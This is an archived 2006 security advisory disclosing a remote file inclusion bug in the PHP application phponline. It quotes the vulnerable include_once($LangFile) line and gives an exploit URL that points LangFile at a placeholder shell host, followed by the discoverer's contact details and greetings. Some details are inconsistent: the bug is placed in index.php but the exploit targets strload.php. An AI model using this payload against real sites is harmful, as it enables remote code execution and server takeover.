phponline <= (LangFile) Remote File Inclusion Exploit

2006-10-07T00:00:00
ID SECURITYVULNS:DOC:14582
Type securityvulns
Reporter Securityvulns
Modified 2006-10-07T00:00:00

Description

=======================================================================

=======================

phponline <= (LangFile) Remote File Inclusion Exploit

=======================================================================

========================

Bug in :index.php

Vlu Code :

--------------------------------

include_once($LangFile);

=======================================================================

=========================

Exploit :

--------------------------------

htpp://sitename.com/[scerpitPath]/strload.php?LangFile=http://SHELLURL.COM

=======================================================================

=========================

Discoverd By : MoHaNdKo

Conatact : xp1o (at) msn (dot) com [email concealed]

or

wWw.xP10.CoM & wWw.TRyaG.CoM

Greetz : r00tshell ( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF &

abu melaf & mohagr22 & metoovet & fuck_net & νίρεя~ђάςκεя & hitlar gada

and all member on xp10.com and tryag.com and lezr.com

========================================================================

vendor: http://www.dayanahost.com/file/phponline_2.1.1.zip